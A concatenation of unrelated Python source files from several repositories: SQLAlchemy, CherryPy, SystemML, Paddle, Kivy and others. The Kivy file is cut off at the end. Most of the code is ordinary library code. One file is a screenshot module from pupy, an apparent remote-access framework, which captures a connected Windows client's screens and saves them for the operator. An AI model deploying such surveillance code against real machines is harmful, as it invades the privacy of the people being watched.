self.parent._remove_item(self.name)
_registries.discard(self)
def resolve_attr(self, key):
return getattr(self.mod_ns, key)
def get_module(self, name):
if name not in self.contents:
marker = _ModuleMarker(name, self)
self.contents[name] = marker
else:
marker = self.contents[name]
return marker
def add_class(self, name, cls):
if name in self.contents:
existing = self.contents[name]
existing.add_item(cls)
else:
existing = self.contents[name] = \
_MultipleClassMarker([cls],
on_remove=lambda: self._remove_item(name))
class _ModNS(object):
def __init__(self, parent):
self.__parent = parent
def __getattr__(self, key):
try:
value = self.__parent.contents[key]
except KeyError:
pass
else:
if value is not None:
if isinstance(value, _ModuleMarker):
return value.mod_ns
else:
assert isinstance(value, _MultipleClassMarker)
return value.attempt_get(self.__parent.path, key)
raise AttributeError("Module %r has no mapped classes "
"registered under the name %r" % (self.__parent.name, key))
class _GetColumns(object):
def __init__(self, cls):
self.cls = cls
def __getattr__(self, key):
mp = class_mapper(self.cls, configure=False)
if mp:
if key not in mp.all_orm_descriptors:
raise exc.InvalidRequestError(
"Class %r does not have a mapped column named %r"
% (self.cls, key))
desc = mp.all_orm_descriptors[key]
if desc.extension_type is interfaces.NOT_EXTENSION:
prop = desc.property
if isinstance(prop, SynonymProperty):
key = prop.name
elif not isinstance(prop, ColumnProperty):
raise exc.InvalidRequestError(
"Property %r is not an instance of"
" ColumnProperty (i.e. does not correspond"
" directly to a Column)." % key)
return getattr(self.cls, key)
class _GetTable(object):
def __init__(self, key, metadata):
self.key = key
self.metadata = metadata
def __getattr__(self, key):
return self.metadata.tables[
_get_table_key(key, self.key)
]
def _determine_container(key, value):
if isinstance(value, _MultipleClassMarker):
value = value.attempt_get([], key)
return _GetColumns(value)
def _resolver(cls, prop):
def resolve_arg(arg):
import sqlalchemy
from sqlalchemy.orm import foreign, remote
fallback = sqlalchemy.__dict__.copy()
fallback.update({'foreign': foreign, 'remote': remote})
def access_cls(key):
if key in cls._decl_class_registry:
return _determine_container(key, cls._decl_class_registry[key])
elif key in cls.metadata.tables:
return cls.metadata.tables[key]
elif key in cls.metadata._schemas:
return _GetTable(key, cls.metadata)
elif '_sa_module_registry' in cls._decl_class_registry and \
key in cls._decl_class_registry['_sa_module_registry']:
registry = cls._decl_class_registry['_sa_module_registry']
return registry.resolve_attr(key)
else:
return fallback[key]
d = util.PopulateDict(access_cls)
def return_cls():
try:
x = eval(arg, globals(), d)
if isinstance(x, _GetColumns):
return x.cls
else:
return x
except NameError as n:
raise exc.InvalidRequestError(
"When initializing mapper %s, expression %r failed to "
"locate a name (%r). If this is a class name, consider "
"adding this relationship() to the %r class after "
"both dependent classes have been defined." %
(prop.parent, arg, n.args[0], cls)
)
return return_cls
return resolve_arg
def _deferred_relationship(cls, prop):
if isinstance(prop, RelationshipProperty):
resolve_arg = _resolver(cls, prop)
for attr in ('argument', 'order_by', 'primaryjoin', 'secondaryjoin',
'secondary', '_user_defined_foreign_keys', 'remote_side'):
v = getattr(prop, attr)
if isinstance(v, str):
setattr(prop, attr, resolve_arg(v))
if prop.backref and isinstance(prop.backref, tuple):
key, kwargs = prop.backref
for attr in ('primaryjoin', 'secondaryjoin', 'secondary',
'foreign_keys', 'remote_side', 'order_by'):
if attr in kwargs and isinstance(kwargs[attr], str):
kwargs[attr] = resolve_arg(kwargs[attr])
return prop
| mit |
CeltonMcGrath/TACTIC | 3rd_party/CherryPy/cherrypy/test/test_mime.py | 6 | 3459 | """Tests for various MIME issues, including the safe_multipart Tool."""
from cherrypy.test import test
test.prefer_parent_path()
import cherrypy
def setup_server():
class Root:
def multipart(self, parts):
return repr(parts)
multipart.exposed = True
def flashupload(self, Filedata, Upload, Filename):
return ("Upload: %r, Filename: %r, Filedata: %r" %
(Upload, Filename, Filedata.file.read()))
flashupload.exposed = True
cherrypy.config.update({'server.max_request_body_size': 0})
cherrypy.tree.mount(Root())
# Client-side code #
from cherrypy.test import helper
class MultipartTest(helper.CPWebCase):
def test_multipart(self):
text_part = u"This is the text version"
html_part = u"""<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type">
</head>
<body bgcolor="#ffffff" text="#000000">
This is the <strong>HTML</strong> version
</body>
</html>
"""
body = '\r\n'.join([
"--123456789",
"Content-Type: text/plain; charset='ISO-8859-1'",
"Content-Transfer-Encoding: 7bit",
"",
text_part,
"--123456789",
"Content-Type: text/html; charset='ISO-8859-1'",
"",
html_part,
"--123456789--"])
headers = [
('Content-Type', 'multipart/mixed; boundary=123456789'),
('Content-Length', len(body)),
]
self.getPage('/multipart', headers, "POST", body)
self.assertBody(repr([text_part, html_part]))
class SafeMultipartHandlingTest(helper.CPWebCase):
def test_Flash_Upload(self):
headers = [
('Accept', 'text/*'),
('Content-Type', 'multipart/form-data; '
'boundary=----------KM7Ij5cH2KM7Ef1gL6ae0ae0cH2gL6'),
('User-Agent', 'Shockwave Flash'),
('Host', 'www.example.com:8080'),
('Content-Length', '499'),
('Connection', 'Keep-Alive'),
('Cache-Control', 'no-cache'),
]
filedata = ('<?xml version="1.0" encoding="UTF-8"?>\r\n'
'<projectDescription>\r\n'
'</projectDescription>\r\n')
body = (
'------------KM7Ij5cH2KM7Ef1gL6ae0ae0cH2gL6\r\n'
'Content-Disposition: form-data; name="Filename"\r\n'
'\r\n'
'.project\r\n'
'------------KM7Ij5cH2KM7Ef1gL6ae0ae0cH2gL6\r\n'
'Content-Disposition: form-data; '
'name="Filedata"; filename=".project"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
+ filedata +
'\r\n'
'------------KM7Ij5cH2KM7Ef1gL6ae0ae0cH2gL6\r\n'
'Content-Disposition: form-data; name="Upload"\r\n'
'\r\n'
'Submit Query\r\n'
# Flash apps omit the trailing \r\n on the last line:
'------------KM7Ij5cH2KM7Ef1gL6ae0ae0cH2gL6--'
)
self.getPage('/flashupload', headers, "POST", body)
self.assertBody("Upload: u'Submit Query', Filename: u'.project', "
"Filedata: %r" % filedata)
if __name__ == '__main__':
helper.testmain()
| epl-1.0 |
asurve/incubator-systemml | src/main/python/systemml/random/sampling.py | 13 | 5293 | #-------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
#-------------------------------------------------------------
__all__ = ['normal', 'uniform', 'poisson']
from ..defmatrix import *
# Special object used internally to specify the placeholder which will be replaced by output ID
# This helps to provide dml containing output ID in constructSamplingNode
OUTPUT_ID = '$$OutputID$$'
def constructSamplingNode(inputs, dml):
"""
Convenient utility to create an intermediate of AST.
Parameters
----------
inputs = list of input matrix objects and/or DMLOp
dml = list of DML string (which will be eventually joined before execution). To specify out.ID, please use the placeholder
"""
dmlOp = DMLOp(inputs)
out = matrix(None, op=dmlOp)
dmlOp.dml = [out.ID if x==OUTPUT_ID else x for x in dml]
return out
INPUTS = []
def asStr(arg):
"""
Internal use only: Convenient utility to update inputs and return appropriate string value
"""
if isinstance(arg, matrix):
INPUTS = INPUTS + [ arg ]
return arg.ID
else:
return str(arg)
def normal(loc=0.0, scale=1.0, size=(1,1), sparsity=1.0):
"""
Draw random samples from a normal (Gaussian) distribution.
Parameters
----------
loc: Mean ("centre") of the distribution.
scale: Standard deviation (spread or "width") of the distribution.
size: Output shape (only tuple of length 2, i.e. (m, n), supported).
sparsity: Sparsity (between 0.0 and 1.0).
Examples
--------
>>> import systemml as sml
>>> import numpy as np
>>> sml.setSparkContext(sc)
>>> from systemml import random
>>> m1 = sml.random.normal(loc=3, scale=2, size=(3,3))
>>> m1.toNumPy()
array([[ 3.48857226, 6.17261819, 2.51167259],
[ 3.60506708, -1.90266305, 3.97601633],
[ 3.62245706, 5.9430881 , 2.53070413]])
"""
if len(size) != 2:
raise TypeError('Incorrect type for size. Expected tuple of length 2')
INPUTS = []
rows = asStr(size[0])
cols = asStr(size[1])
loc = asStr(loc)
scale = asStr(scale)
sparsity = asStr(sparsity)
# loc + scale*standard normal
return constructSamplingNode(INPUTS, [OUTPUT_ID, ' = ', loc,' + ', scale,' * random.normal(', rows, ',', cols, ',', sparsity, ')\n'])
def uniform(low=0.0, high=1.0, size=(1,1), sparsity=1.0):
"""
Draw samples from a uniform distribution.
Parameters
----------
low: Lower boundary of the output interval.
high: Upper boundary of the output interval.
size: Output shape (only tuple of length 2, i.e. (m, n), supported).
sparsity: Sparsity (between 0.0 and 1.0).
Examples
--------
>>> import systemml as sml
>>> import numpy as np
>>> sml.setSparkContext(sc)
>>> from systemml import random
>>> m1 = sml.random.uniform(size=(3,3))
>>> m1.toNumPy()
array([[ 0.54511396, 0.11937437, 0.72975775],
[ 0.14135946, 0.01944448, 0.52544478],
[ 0.67582422, 0.87068849, 0.02766852]])
"""
if len(size) != 2:
raise TypeError('Incorrect type for size. Expected tuple of length 2')
INPUTS = []
rows = asStr(size[0])
cols = asStr(size[1])
low = asStr(low)
high = asStr(high)
sparsity = asStr(sparsity)
return constructSamplingNode(INPUTS, [OUTPUT_ID, ' = random.uniform(', rows, ',', cols, ',', sparsity, ',', low, ',', high, ')\n'])
def poisson(lam=1.0, size=(1,1), sparsity=1.0):
"""
Draw samples from a Poisson distribution.
Parameters
----------
lam: Expectation of interval, should be > 0.
size: Output shape (only tuple of length 2, i.e. (m, n), supported).
sparsity: Sparsity (between 0.0 and 1.0).
Examples
--------
>>> import systemml as sml
>>> import numpy as np
>>> sml.setSparkContext(sc)
>>> from systemml import random
>>> m1 = sml.random.poisson(lam=1, size=(3,3))
>>> m1.toNumPy()
array([[ 1., 0., 2.],
[ 1., 0., 0.],
[ 0., 0., 0.]])
"""
if len(size) != 2:
raise TypeError('Incorrect type for size. Expected tuple of length 2')
INPUTS = []
rows = asStr(size[0])
cols = asStr(size[1])
lam = asStr(lam)
sparsity = asStr(sparsity)
return constructSamplingNode(INPUTS, [OUTPUT_ID, ' = random.poisson(', rows, ',', cols, ',', sparsity, ',', lam, ')\n'])
| apache-2.0 |
zigitax/pupy | pupy/modules/screenshot.py | 27 | 3951 | # -*- coding: UTF8 -*-
# --------------------------------------------------------------
# Copyright (c) 2015, Nicolas VERDIER ([email protected])
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
# --------------------------------------------------------------
from pupylib.PupyModule import *
from rpyc.utils.classic import download
import os
import os.path
import textwrap
import logging
import datetime
from zlib import compress, crc32
import struct
import subprocess
__class_name__="Screenshoter"
def pil_save(filename, pixels, width, height):
from PIL import Image, ImageFile
buffer_len = (width * 3 + 3) & -4
img = Image.frombuffer('RGB', (width, height), pixels, 'raw', 'BGR', buffer_len, 1)
ImageFile.MAXBLOCK = width * height
img=img.transpose(Image.FLIP_TOP_BOTTOM)
img.save(filename, quality=95, optimize=True, progressive=True)
logging.info('Screenshot saved to %s'%filename)
class Screenshoter(PupyModule):
""" take a screenshot :) """
@windows_only
def is_compatible(self):
pass
def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog='screenshot', description=self.__doc__)
self.arg_parser.add_argument('-e', '--enum', action='store_true', help='enumerate screen')
self.arg_parser.add_argument('-s', '--screen', type=int, default=None, help='take a screenshot on a specific screen (default all screen on one screenshot)')
self.arg_parser.add_argument('-v', '--view', action='store_true', help='directly open eog on the screenshot for preview')
def run(self, args):
try:
os.makedirs("./data/screenshots")
except Exception:
pass
self.client.load_package("pupwinutils.screenshot")
screens=None
if args.screen is None:
screens=self.client.conn.modules['pupwinutils.screenshot'].enum_display_monitors(oneshot=True)
else:
screens=self.client.conn.modules['pupwinutils.screenshot'].enum_display_monitors()
if args.enum:
res=""
for i, screen in enumerate(screens):
res+="{:<3}: {}\n".format(i,screen)
return res
if args.screen is None:
args.screen=0
selected_screen=screens[args.screen]
screenshot_pixels=self.client.conn.modules["pupwinutils.screenshot"].get_pixels(selected_screen)
filepath=os.path.join("./data/screenshots","scr_"+self.client.short_name()+"_"+str(datetime.datetime.now()).replace(" ","_").replace(":","-")+".jpg")
pil_save(filepath, screenshot_pixels, selected_screen["width"], selected_screen["height"])
if args.view:
subprocess.Popen(["eog",filepath])
self.success("screenshot saved to %s"%filepath)
| bsd-3-clause |
PaddlePaddle/Paddle | python/paddle/fluid/tests/unittests/mkldnn/test_quantize_mkldnn_op.py | 2 | 6353 | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from paddle.fluid.tests.unittests.op_test import OpTest
class TestQuantizeOp(OpTest):
def setUp(self):
self.op_type = 'quantize'
self.scale = 255.0
self.shift = 0.0
self.input_size = [1, 1, 5, 5] # Naive nChw16c
self.is_negative = False
self.output_format = 'NCHW'
self.set_scale()
self.set_shift()
self.set_is_negative()
self.set_input_size()
self.set_output_format()
self.prepare_input()
self.prepare_output()
def prepare_input(self):
if self.is_negative:
# input data values are from interval [-1.0, 1.0)
self.input = (2 * np.random.random_sample(self.input_size) - 1
).astype('float32')
else:
# input data values are from interval [0.0, 1.0)
self.input = (
np.random.random_sample(self.input_size)).astype('float32')
self.inputs = {'Input': OpTest.np_dtype_to_fluid_dtype(self.input)}
self.attrs = {
'Scale': self.scale,
'Shift': self.shift,
'is_negative_input': self.is_negative,
'output_format': self.output_format
}
def prepare_output(self):
input_data_type = 'int8' if self.is_negative else 'uint8'
output = np.rint(self.input * self.scale + self.shift).astype(
input_data_type)
self.outputs = {'Output': output}
def test_check_output(self):
# TODO(wangzhongpu): support mkldnn op in dygraph mode
self.check_output(check_dygraph=False)
def check_raise_error(self, msg):
try:
self.check_output()
except Exception as e:
if msg in str(e):
raise AttributeError
else:
print(e)
def set_scale(self):
pass
def set_shift(self):
pass
def set_is_negative(self):
pass
def set_input_size(self):
pass
def set_output_format(self):
pass
class TestQuantizeOp1(TestQuantizeOp):
def set_scale(self):
self.scale = 127.0
def set_is_negative(self):
self.is_nagative = True
class TestQuantizeOp2(TestQuantizeOp):
def set_scale(self):
self.scale = 255.0
def set_is_negative(self):
self.is_nagative = False
class TestQuantizeOp_ZeroScale(TestQuantizeOp):
def set_scale(self):
self.scale = 0.0
def prepare_output(self):
self.output = np.zeros(self.input_size)
self.outputs = {'Output': self.output}
def test_check_output(self):
self.assertRaises(AttributeError, self.check_raise_error,
'Quantization scale cannot be 0.0')
# 2-dim input
# P - positive input
class TestQuantizeOpShift_NCHW_2_P(TestQuantizeOp):
def set_output_format(self):
self.output_format = 'NCHW'
def set_is_negative(self):
self.is_nagative = False
def set_scale(self):
self.scale = 255.0
def set_shift(self):
self.shift = 0.0
def set_input_size(self):
self.input_size = [2, 3]
# 2-dim input
# N - negative input
class TestQuantizeOpShift_NCHW_2_N(TestQuantizeOpShift_NCHW_2_P):
def set_is_negative(self):
self.is_nagative = True
def set_scale(self):
self.scale = 127.0
def set_shift(self):
self.shift = 128.0
class TestQuantizeOpShift_NHWC_2_P(TestQuantizeOpShift_NCHW_2_P):
def set_output_format(self):
self.output_format = 'NHWC'
class TestQuantizeOpShift_NHWC_2_N(TestQuantizeOpShift_NCHW_2_N):
def set_output_format(self):
self.output_format = 'NHWC'
# 3-dim input
class TestQuantizeOpShift_NCHW_3_P(TestQuantizeOpShift_NCHW_2_P):
def set_input_size(self):
self.input_size = [2, 3, 4]
class TestQuantizeOpShift_NCHW_3_N(TestQuantizeOpShift_NCHW_2_N):
def set_input_size(self):
self.input_size = [2, 3, 4]
class TestQuantizeOpShift_NHWC_3_P(TestQuantizeOpShift_NCHW_3_P):
def set_output_format(self):
self.output_format = 'NHWC'
class TestQuantizeOpShift_NHWC_3_N(TestQuantizeOpShift_NCHW_3_N):
def set_output_format(self):
self.output_format = 'NHWC'
# 4-dim input
class TestQuantizeOpShift_NCHW_4_P(TestQuantizeOpShift_NCHW_2_P):
def set_input_size(self):
self.input_size = [2, 3, 4, 5]
class TestQuantizeOpShift_NCHW_4_N(TestQuantizeOpShift_NCHW_2_N):
def set_input_size(self):
self.input_size = [2, 3, 4, 5]
class TestQuantizeOpShift_NHWC_4_P(TestQuantizeOpShift_NCHW_4_P):
def set_output_format(self):
self.output_format = 'NHWC'
class TestQuantizeOpShift_NHWC_4_N(TestQuantizeOpShift_NCHW_4_N):
def set_output_format(self):
self.output_format = 'NHWC'
class TestQuantizeOp_NegativeShift(TestQuantizeOp):
def set_is_negative(self):
self.is_nagative = False
def set_scale(self):
self.scale = 100.0
def set_shift(self):
self.shift = -10.0
def prepare_output(self):
self.output = np.zeros(self.input_size)
self.outputs = {'Output': self.output}
def test_check_output(self):
self.assertRaises(AttributeError, self.check_raise_error,
'Quantization shift must be nonnegative.')
class TestQuantizeOp_TooBigShift(TestQuantizeOp_NegativeShift):
def set_shift(self):
self.shift = 300.0
def test_check_output(self):
self.assertRaises(
AttributeError, self.check_raise_error,
'Quantization shift must be less than or equal to 255.')
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
seler/gipsy | gipsy/dashboard/presets/google_analytics.py | 4 | 1666 | from gipsy.dashboard.dashboard import Dashboard
from gipsy.dashboard.widgets import widgets, widgets_google_analytics
class DashboardDefault(Dashboard):
"""
Defaut and exemple class for dashboards using google analytics specific widgets.
This class simply uses a render method where widgets are added. The widgets property is a list
that can be appended as follow.
The google analytics widgets are plug and play but of course feel free to overwrite them.
Read the documentation for more information on how to setup google analytics on yourapplication.
"""
def render(self):
# metrics evolution
self.widgets.append(widgets_google_analytics.WidgetGAPageViewsEvolution())
# metrics evolution
self.widgets.append(widgets_google_analytics.WidgetGASessionsEvolution())
# metrics single
self.widgets.append(widgets.WidgetMetricsSingle(
title='currently active users',
label='active users',
count=2564,
))
# line chart
self.widgets.append(widgets_google_analytics.WidgetGALineChart())
# metrics list
self.widgets.append(widgets.WidgetMetricsList(items=[
{'icon': 'fa-file-image-o', 'label': 'posts', 'value': 75},
{'icon': 'fa-comment-o', 'label': 'comments', 'value': 192},
{'icon': 'fa-files-o', 'label': 'pages', 'value': 12},
{'icon': 'fa-flag-o', 'label': 'in moderation', 'value': 4},
]))
# model list
self.widgets.append(widgets.WidgetModelList(items={}))
# admin logs
self.widgets.append(widgets.WidgetAdminLog())
| bsd-3-clause |
girishramnani/hacking-tools | pyhashcat/sre_yield/tests/test_cachingseq.py | 3 | 2039 | #!/usr/bin/env python2
#
# Copyright 2011-2014 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from sre_yield import cachingseq
class CachingFuncSequenceTest(unittest.TestCase):
def testLimits(self):
c = cachingseq.CachingFuncSequence(lambda i: i, 10)
self.assertEqual(9, c[9])
self.assertEqual(9, c[-1])
self.assertEqual(0, c[0])
self.assertEqual(0, c[-10])
self.assertRaises(IndexError, lambda: c[10])
self.assertRaises(IndexError, lambda: c[11])
self.assertRaises(IndexError, lambda: c[-11])
self.assertRaises(IndexError, lambda: c[-12])
self.assertEqual(2, len(c._cache))
# Make sure .func is settable at runtime...
c.func = lambda i: 'bbb'
self.assertEqual('bbb', c[1])
# ...and that we don't call it again.
self.assertEqual(0, c[0])
def testIter(self):
c = cachingseq.CachingFuncSequence(lambda i: i, 10)
# Cache empty on construction
self.assertEqual(0, len(c._cache))
self.assertEqual(10, len(c))
self.assertEqual(list(range(10)), list(c))
# Cache full after iteration
self.assertEqual(10, len(c._cache))
def testIncFunc(self):
def first_func(x):
assert x == 0
return 1
def inc_func(i, prev):
return prev * 2
c = cachingseq.CachingFuncSequence(first_func, 10, inc_func)
self.assertEqual([1, 2, 4, 8, 16, 32, 64, 128, 256, 512], list(c))
| mit |
earshel/PokeyPySnipe | POGOProtos/Networking/Requests/Messages/EncounterMessage_pb2.py | 16 | 3623 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Networking/Requests/Messages/EncounterMessage.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Networking/Requests/Messages/EncounterMessage.proto',
package='POGOProtos.Networking.Requests.Messages',
syntax='proto3',
serialized_pb=_b('\n>POGOProtos/Networking/Requests/Messages/EncounterMessage.proto\x12\'POGOProtos.Networking.Requests.Messages\"s\n\x10\x45ncounterMessage\x12\x14\n\x0c\x65ncounter_id\x18\x01 \x01(\x06\x12\x16\n\x0espawn_point_id\x18\x02 \x01(\t\x12\x17\n\x0fplayer_latitude\x18\x03 \x01(\x01\x12\x18\n\x10player_longitude\x18\x04 \x01(\x01\x62\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_ENCOUNTERMESSAGE = _descriptor.Descriptor(
name='EncounterMessage',
full_name='POGOProtos.Networking.Requests.Messages.EncounterMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='encounter_id', full_name='POGOProtos.Networking.Requests.Messages.EncounterMessage.encounter_id', index=0,
number=1, type=6, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='spawn_point_id', full_name='POGOProtos.Networking.Requests.Messages.EncounterMessage.spawn_point_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='player_latitude', full_name='POGOProtos.Networking.Requests.Messages.EncounterMessage.player_latitude', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='player_longitude', full_name='POGOProtos.Networking.Requests.Messages.EncounterMessage.player_longitude', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=107,
serialized_end=222,
)
DESCRIPTOR.message_types_by_name['EncounterMessage'] = _ENCOUNTERMESSAGE
EncounterMessage = _reflection.GeneratedProtocolMessageType('EncounterMessage', (_message.Message,), dict(
DESCRIPTOR = _ENCOUNTERMESSAGE,
__module__ = 'POGOProtos.Networking.Requests.Messages.EncounterMessage_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Networking.Requests.Messages.EncounterMessage)
))
_sym_db.RegisterMessage(EncounterMessage)
# @@protoc_insertion_point(module_scope)
| mit |
google-code/android-scripting | python/src/Demo/sockets/telnet.py | 47 | 3010 | #! /usr/bin/env python
# Minimal interface to the Internet telnet protocol.
#
# It refuses all telnet options and does not recognize any of the other
# telnet commands, but can still be used to connect in line-by-line mode.
# It's also useful to play with a number of other services,
# like time, finger, smtp and even ftp.
#
# Usage: telnet host [port]
#
# The port may be a service name or a decimal port number;
# it defaults to 'telnet'.
import sys, posix, time
from socket import *
BUFSIZE = 1024
# Telnet protocol characters
IAC = chr(255) # Interpret as command
DONT = chr(254)
DO = chr(253)
WONT = chr(252)
WILL = chr(251)
def main():
host = sys.argv[1]
try:
hostaddr = gethostbyname(host)
except error:
sys.stderr.write(sys.argv[1] + ': bad host name\n')
sys.exit(2)
#
if len(sys.argv) > 2:
servname = sys.argv[2]
else:
servname = 'telnet'
#
if '0' <= servname[:1] <= '9':
port = eval(servname)
else:
try:
port = getservbyname(servname, 'tcp')
except error:
sys.stderr.write(servname + ': bad tcp service name\n')
sys.exit(2)
#
s = socket(AF_INET, SOCK_STREAM)
#
try:
s.connect((host, port))
except error, msg:
sys.stderr.write('connect failed: ' + repr(msg) + '\n')
sys.exit(1)
#
pid = posix.fork()
#
if pid == 0:
# child -- read stdin, write socket
while 1:
line = sys.stdin.readline()
s.send(line)
else:
# parent -- read socket, write stdout
iac = 0 # Interpret next char as command
opt = '' # Interpret next char as option
while 1:
data = s.recv(BUFSIZE)
if not data:
# EOF; kill child and exit
sys.stderr.write( '(Closed by remote host)\n')
posix.kill(pid, 9)
sys.exit(1)
cleandata = ''
for c in data:
if opt:
print ord(c)
s.send(opt + c)
opt = ''
elif iac:
iac = 0
if c == IAC:
cleandata = cleandata + c
elif c in (DO, DONT):
if c == DO: print '(DO)',
else: print '(DONT)',
opt = IAC + WONT
elif c in (WILL, WONT):
if c == WILL: print '(WILL)',
else: print '(WONT)',
opt = IAC + DONT
else:
print '(command)', ord(c)
elif c == IAC:
iac = 1
print '(IAC)',
else:
cleandata = cleandata + c
sys.stdout.write(cleandata)
sys.stdout.flush()
try:
main()
except KeyboardInterrupt:
pass
| apache-2.0 |
viralpandey/kivy | kivy/geometry.py | 47 | 3795 | '''
Geometry utilities
==================
This module contains some helper functions for geometric calculations.
'''
__all__ = ('circumcircle', 'minimum_bounding_circle')
from kivy.vector import Vector
def circumcircle(a, b, c):
'''
Computes the circumcircle of a triangle defined by a, b, c.
See: http://en.wikipedia.org/wiki/Circumscribed_circle
:Parameters:
`a` : iterable containing at least 2 values (for x and y)
The 1st point of the triangle.
`b` : iterable containing at least 2 values (for x and y)
The 2nd point of the triangle.
`c` : iterable containing at least 2 values (for x and y)
The 3rd point of the triangle.
:Return:
A tuple that defines the circle :
* The first element in the returned tuple is the center as (x, y)
* The second is the radius (float)
'''
P = Vector(a[0], a[1])
Q = Vector(b[0], b[1])
R = Vector(c[0], c[1])
mPQ = (P + Q) * .5
mQR = (Q + R) * .5
numer = -(- mPQ.y * R.y + mPQ.y * Q.y + mQR.y * R.y - mQR.y * Q.y
- mPQ.x * R.x + mPQ.x * Q.x + mQR.x * R.x - mQR.x * Q.x)
denom = (-Q.x * R.y + P.x * R.y - P.x * Q.y +
Q.y * R.x - P.y * R.x + P.y * Q.x)
t = numer / denom
cx = -t * (Q.y - P.y) + mPQ.x
cy = t * (Q.x - P.x) + mPQ.y
return ((cx, cy), (P - (cx, cy)).length())
def minimum_bounding_circle(points):
'''
Returns the minimum bounding circle for a set of points.
For a description of the problem being solved, see the `Smallest Circle
Problem <http://en.wikipedia.org/wiki/Smallest_circle_problem>`_.
The function uses Applet's Algorithm, the runtime is O\(h^3, \*n\),
where h is the number of points in the convex hull of the set of points.
**But** it runs in linear time in almost all real world cases.
See: http://tinyurl.com/6e4n5yb
:Parameters:
`points` : iterable
A list of points (2 tuple with x,y coordinates)
:Return:
A tuple that defines the circle:
* The first element in the returned tuple is the center (x, y)
* The second the radius (float)
'''
points = [Vector(p[0], p[1]) for p in points]
if len(points) == 1:
return (points[0].x, points[0].y), 0.0
if len(points) == 2:
p1, p2 = points
return (p1 + p2) * .5, ((p1 - p2) * .5).length()
# determine a point P with the smallest y value
P = min(points, key=lambda p: p.y)
# find a point Q such that the angle of the line segment
# PQ with the x axis is minimal
def x_axis_angle(q):
if q == P:
return 1e10 # max val if the same, to skip
return abs((q - P).angle((1, 0)))
Q = min(points, key=x_axis_angle)
for p in points:
# find R such that angle PRQ is minimal
def angle_pq(r):
